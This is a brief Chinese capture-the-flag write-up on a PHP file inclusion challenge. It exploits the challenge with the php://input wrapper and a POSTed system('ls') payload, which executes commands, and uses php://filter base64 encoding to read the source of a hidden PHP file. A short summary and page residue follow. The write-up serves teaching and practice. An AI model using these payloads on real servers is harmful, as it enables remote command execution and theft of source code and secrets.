考察文件包含
打开题目:发现 allow_url_include on

直接构造?path=php://input
post参数<?php echo system('ls');?>列出文件名看看:

发现有个奇怪的文件:dle345aae.php
查看此文件内容:使用php://filter协议查看曝露出来的文件的内容,因为PHP文件不能直接显示内容所以先base64显示出来,然后再解码。
构造语句:
?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

解码:

bingo
本文介绍了一种通过利用文件包含漏洞来获取敏感信息的方法。通过构造特定的URL参数,可以触发服务器上的文件包含功能,进而读取任意文件内容。具体操作包括使用allow_url_include选项和php://input流,结合POST参数和php://filter协议来读取并解码目标文件。
777

被折叠的 条评论
为什么被折叠?



